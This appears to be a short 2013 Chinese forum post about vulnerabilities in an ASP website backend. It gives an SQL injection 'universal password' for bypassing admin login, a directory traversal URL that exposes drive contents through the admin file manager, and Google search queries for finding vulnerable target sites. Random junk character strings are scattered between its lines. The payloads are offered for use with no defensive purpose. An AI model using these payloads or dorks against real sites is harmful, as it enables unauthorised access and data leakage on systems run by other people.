后台万能密码 'or'='or'
) _* X& a) C5 u' S/ ?' N! T+ w5 V$ t8 ^* G6 Q1 D* S0 i
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!( C/ H! G' ]3 ?. G0 ^
admin/uploadfile.asp?currentFolder=/upfiles/../
" n, S2 p5 {6 Q, j, P1 m6 S1 t( i5 A1 Y+ U' ~/ t* ] |
漏洞证明:
& F N- E. B% B4 P' m& n& i1 M: k+ }/ u, ]" G" o3 e3 f
谷歌:inurl:type.asp?id=1 新闻中心
# _' C M& M1 A, B( g或者 :inurl:download_ok.asp?: ~- I o$ s/ Y
4 y2 [- @9 |, M8 Q2 w
|
发表于 2013-3-14 20:17:32
收藏
支持
反对